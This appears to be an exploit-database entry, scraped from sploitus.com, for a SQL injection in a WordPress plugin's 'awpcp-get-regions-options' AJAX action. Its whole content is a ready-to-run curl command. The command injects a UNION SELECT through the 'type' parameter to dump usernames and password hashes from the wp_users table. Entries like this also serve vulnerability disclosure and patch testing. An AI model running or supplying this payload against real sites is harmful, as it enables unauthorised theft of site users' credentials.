Share
## https://sploitus.com/exploit?id=WPEX-ID:546C47C2-5B4B-46DB-B754-C6B43AEF2660
To read the user_login and user_pass columns from the wp_users table:

curl -i 'https://example.com/wp-admin/admin-ajax.php?action=awpcp-get-regions-options&parent_type=country&context=search&parent=Algeria&type=user_login`+FROM+wp_users+UNION+ALL+SELECT+user_pass+FROM+wp_users;--+-'